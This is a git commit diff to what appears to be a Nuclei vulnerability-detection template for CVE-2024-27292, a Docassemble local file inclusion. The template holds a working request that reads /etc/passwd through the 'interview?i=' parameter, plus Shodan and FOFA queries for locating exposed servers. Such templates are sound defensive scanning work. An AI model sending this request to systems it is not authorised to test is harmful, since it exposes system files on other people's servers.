minor update

patch-4
Dhiyaneshwaran 2024-07-02 15:36:30 +05:30 committed by GitHub
parent a3b2a88759
commit 1f67112c1b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 15 additions and 9 deletions

View File

@ -1,22 +1,30 @@
id: CVE-2024-27292
info:
name: CVE-2024-27292
name: Docassemble - Local File Inclusion
author: johnk3r
severity: high
description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
description: |
Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
reference:
- https://tantosec.com/blog/docassemble/
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
- https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-27292
cwe-id: CWE-706
epss-score: 0.00043
epss-percentile: 0.0866
metadata:
verified: true
max-request: 2
max-request: 1
shodan-query: http.title:"docassemble"
fofa-query:
- icon_hash="-575790689"
tags: lfi,docassemble,cve,cve2024
fofa-query: icon_hash="-575790689"
tags: cve,cve2024,docassemble,lfi
requests:
http:
- method: GET
path:
- "{{BaseURL}}/interview?i=/etc/passwd"
@ -25,9 +33,7 @@ requests:
matchers:
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- "root:.*:0:0:"
condition: or
- type: status
status: